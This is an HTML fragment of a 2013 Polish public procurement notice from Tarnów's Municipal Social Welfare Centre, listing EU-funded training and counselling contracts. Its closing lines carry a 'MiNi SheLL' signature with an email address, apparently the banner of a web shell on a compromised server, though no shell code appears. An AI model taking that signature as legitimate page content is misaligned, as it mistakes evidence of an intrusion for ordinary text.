<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.09.2013 godzina 10:00, miejsce: Oferty należy składać w siedzibie Zamawiającego w sekretariacie Miejskiego Ośrodka Pomocy Społecznej w Tarnowie, 33- 100 Tarnów, al. Matki Bożej Fatimskiej 9, pokój nr 20.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1 pn. Stawiamy na aktywność. Działania aktywizujące klientów Miejskiego Ośrodka Pomocy Społecznej w Tarnowie. Zamówienie jest finansowane w całości ze środków publicznych. Zamawiający nie przewiduje zawarcia umowy ramowej. Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie poradnictw, szkolenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A) Zorganizowanie i przeprowadzenie szkolenia Szkoła dla rodziców, 
Kod CPV- 80 53 00 00  8 - usługi szkolenia zawodowego, 805 300 00 9 - usługi szkoleniowe, 79 11 10 00 - 5- usługa w zakresie doradztwa prawnego. Zakres zamówienia obejmuje cztery moduły:
Pierwszy moduł zawiera zagadnienia związane z budowaniem relacji rodzic - dziecko, w tym: -  świadomość własnych celów wychowawczych, - umiejętność poznania własnych uczuć i dziecka, - sposoby wyrażania i akceptowania uczuć, - aktywne słuchanie, -umiejętność stawiania dziecku granic oraz uczenia dziecka samodyscypliny, - budowanie poczucia własnej wartości oraz samodzielności dziecka, - wspólne rozwiązywanie konfliktów.
Drugi  moduł zawiera zagadnienia związane z relacjami między rodzeństwem oraz rówieśnikami: - sytuacja konfliktowa, kłótnie, radzenie sobie z agresją, - rywalizacja, - wpływ ról na relacje między dziećmi, -  znaczenie i funkcje grupy rówieśniczej.
Trzeci moduł zawiera zagadnienia związane z trudnościami występującymi w wieku dorastania: - możliwości emocjonalne dziecka a wymogi współczesnej kultury, - potrzeba akceptacji w  grupie rówieśniczej, - młodzieńczy bunt, - zagrożenia: narkotyki, alkohol, zaburzenia łaknienia itp.
Czwarty moduł zawiera zagadnienia z zakresu prawa rodzinnego: - małżeństwo i rodzina w świetle prawa, - prawa i obowiązki małżonków, - władza rodzicielska, - obowiązek alimentacyjny, - ustanie małżeństwa.
Liczba uczestników -  29 osób podzielonych na dwie grupy. Liczba  godzin - moduł pierwszy obejmuje 15 godzin, moduł drugi obejmuje 15  godzin, moduł trzeci obejmuje 15 godzin, moduł czwarty 10 godzin. Moduły mogą odbywać się naprzemiennie lub następując po sobie - tj.  55 godzin dydaktycznych w przeliczeniu na jedną grupę (łącznie  110 godzin).
B) Zorganizowanie i przeprowadzenie  poradnictwa z  prawnikiem  z zakresu prawa rodzinnego,  Kod CPV: 79140000-7 - doradztwo prawne i usługi informacyjne,  79 11 10 00 - 5- usługa w zakresie doradztwa prawnego,  805 300 00 9 - usługi szkoleniowe. Zakres  zamówienia obejmuje następujące  zagadnienia: - instytucja  małżeństwa i rodziny w świetle prawa rodzinnego, - władza rodzicielska - powstanie władzy rodzicielskiej, - ingerencja w wykonywanie władzy rodzicielskiej, - unieważnienie małżeństwa, rozwiązanie małżeństwa przez rozwód, - majątkowe ustroje  małżeńskie, - zniesienie małżeńskiej wspólności ustawowej, - podział majątku wspólnego, - obowiązek alimentacyjny, - przesłanki i zakres obowiązku alimentacyjnego, egzekucja obowiązku alimentacyjnego, - sposoby ustalenia pochodzenia dziecka,  w  tym instytucja uznania dziecka, sądowego ustalenia pochodzenia dziecka, zaprzeczenia macierzyństwa i ojcostwa. 
Liczba uczestników - 2 osoby. Liczba  godzin - po 5 godzin  na osobę konsultacji indywidualnych. Łącznie 10 godzin.
C) Zorganizowanie i przeprowadzenie  poradnictwa z  prawnikiem  z zakresu prawa pracy, Kod CPV: 79140000-7 - doradztwo prawne i usługi informacyjne,  79 11 10 00 - 5- usługa w zakresie doradztwa prawnego,  805 300 00 9 - usługi szkoleniowe. Zakres  zamówienia obejmuje następujące  zagadnienia: 
Nawiązywanie umów o pracę: - prawa i obowiązki pracodawcy i pracownika, - rodzaje umów o pracę, - elementy umowy o pracę, - sporządzenie przykładowej umowy o pracę, -potrącenia  z wynagrodzenia za pracę. Zatrudnianie: -porównanie umowy o pracę, umowy zlecenia i umowy o dzieło, - dokumentowanie stosunku pracy, - podstawowe zasady dotyczące wynagradzania pracownika, - sporządzenie przykładowej listy płac, - podstawowe obowiązki pracodawcy w zakresie ubezpieczeń społecznych, ubezpieczenia zdrowotnego, - sporządzenie wybranych dokumentów zgłoszeniowych na potrzeby ubezpieczeniowe (np. ZUA), rozliczeniowe (DRA, RMUA), - zasady odprowadzania składek ZUS, składki na ubezpieczenie zdrowotne, Fundusz Pracy, Fundusz Gwarantowanych Świadczeń Pracowniczych, zaliczki na podatek dochodowy od osób fizycznych. Zmiana warunków zatrudnienia i rozwiązywanie umów o pracę: - zmiana warunków pracy i płacy, - sposoby rozwiązywania umów (porozumienie, wypowiedzenie, rozwiązanie umowy bez wypowiedzenia). Czas pracy - definicje, wymiar, systemy czasu pracy, praca w godzinach nadliczbowych, w porze nocnej oraz w niedziele i święta: -definicja czasu pracy z praktycznym omówieniem zagadnienia czasu pracy i podróży służbowych pracownika oraz szkoleń pracowniczych,  systemy i rozkłady czasu pracy,  dopuszczalność pracy w godzinach nadliczbowych, w  porze nocnej, niedziele i święta. Liczba uczestników - 1 osoba. Liczba  godzin - 5 godzin konsultacji indywidualnych. 
D) Zorganizowanie i przeprowadzenie poradnictwa specjalistycznego z psychologiem pn. Budowanie własnego wizerunku. Zakres zamówienia obejmuje zagadnienia: - analiza własnego stylu prezentacji pod kątem celu i audytorium, - techniki wywierania pozytywnego wrażenia, - efektywna komunikacja jako narzędzie autoprezentacji, - mowa ciała, praca głosem, - budowanie relacji z odbiorcami - atmosfera, przestrzeń, dynamika, - profesjonalna prezentacja - przygotowanie merytoryczne i mentalne, - sposoby eliminacji stresu, - swoboda głosowa - dynamizm, dykcja, akcentowanie, modulowanie głosem, - wygląd zewnętrzny w autoprezentacji, - wpływ kolorów na wygląd osobisty, ubiór i makijaż. Zajęcia odbywać się będą  m. in. z wykorzystaniem  kamery wideo. 
Dodatkowo tematyka poradnictwa związana będzie z  bieżącymi potrzebami uczestników, które zgłoszą podczas spotkań. Liczba uczestników - 13 osób. Liczba  godzin - 20 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.00.00-9, 79.11.10.00-5, 79.14.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu obsługi kasy fiskalnej i kursu  fakturzysta z obsługą kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A) Kurs obsługi kasy fiskalnej,  Kod CPV - 80 53 00 00  8 - usługi szkolenia zawodowego,  805 300 00 9 - usługi szkoleniowe. Zakres zadania: Po zakończeniu  kursu uczestnik powinien posiadać wiedzę i umiejętności z zakresu: - budowy i działania kas fiskalnych, - technik sprzedaży przy pomocy kasy fiskalnej, - programowania podstawowych parametrów kasy (praktyczna nauka sprzedaży i pracy na kasach, zalogowanie kasjera, wpłata i wypłata gotówki), - sporządzania raportów (fiskalne i podglądowe oraz dzienne i miesięczne). Liczba uczestników - 9 osób. Liczba  godzin - 16 godzin.
B) Kurs fakturzysta z obsługą kasy fiskalnej, Kod CPV - 80 53 00 00  8  - usługi szkolenia zawodowego,  805 300 00 9 - usługi szkoleniowe. Zakres zadania: Po zakończeniu  kursu uczestnik powinien posiadać wiedzę i umiejętności z zakresu: - obowiązujących przepisów prawno-fiskalnych, -	obsługi programu do fakturowania, - wystawiania faktur i paragonów, - obsługi kasy fiskalnej, - podstaw towaroznawstwa. Liczba uczestników - 24 osoby. Liczba  godzin - 43 godziny, w tym  9 godzin zajęć teoretycznych i 34 godziny zajęć praktycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu - opiekun środowiskowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs - opiekun środowiskowy Kod CPV - 80 53 00 00  8 - usługi szkolenia zawodowego,  805 300 00 9 - usługi szkoleniowe. Zakres zadania: W trakcie kursu uczestnik powinien nabyć umiejętności i wiedzę m.in. z zakresu: - wybranych zagadnień prawnych, - wybranych zagadnień z zakresu psychologii, -wybranych zagadnień z zakresu gerontologii, - wybranych zagadnień z zakresu psychiatrii, -dietetyki, - podstaw higieny i pielęgnacji, - udzielania pomocy przedmedycznej, -etyki itp. 
Liczba uczestników - 7 osób. Liczba  godzin - 90 godzin, w tym  75 godzin zajęć teoretycznych oraz 15 godzin zajęć praktycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie  warsztatów aktywnego poszukiwania pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie warsztatów aktywnego poszukiwania pracy, 
Kod CPV -85 31 23 20 - 8 - usługa doradztwa,   805 300 00 9 - usługi szkoleniowe. Tematyka warsztatów: - metody poszukiwania pracy, - przygotowanie dokumentów aplikacyjnych, - przygotowanie do rozmowy kwalifikacyjnej (najczęściej zadawane pytania przez pracodawców, wymogi pracodawców, autoprezentacja). Liczba uczestników - 1 osoba. Liczba  godzin -   8 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8, 80.53.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com